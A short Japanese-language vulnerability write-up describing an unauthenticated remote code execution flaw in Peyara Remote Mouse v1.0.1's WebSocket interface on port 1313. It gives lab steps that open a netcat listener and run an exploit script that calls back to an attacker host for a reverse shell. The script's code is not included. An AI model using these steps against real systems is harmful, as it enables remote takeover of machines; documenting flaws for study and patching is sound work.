
Peyara Remote Mouse v1.0.1- リモートコード実行(RCE)
Peyara Remote Mouse v1.0.1のWebSocketコマンドインターフェース(ポート1313)には、認証なしのリモートコード実行の脆弱性が存在します。このアプリケーションは、WebSocket接続を介して受信したシミュレートされたキーボード入力コマンドを検証またはサニタイズしないため、攻撃者は悪意のあるキーボードイベントを連鎖させて任意のシステムコマンドを実行できます。この脆弱性は認証なしでリモートから悪用でき、システム全体が完全に掌握される可能性があります。
脆弱性のあるアプリケーションをインストール
ターゲットのWindowsシステムにPeyara Remote Mouseをダウンロードしてインストールします。
Netcatリスナーを起動
ターミナルを開いて以下を実行します:
nc -nlvp 4444
エクスプロイトスクリプトを実行
python3 Peyara.py --target 192.168.1.107 --lhost 192.168.1.110 --lport 4444

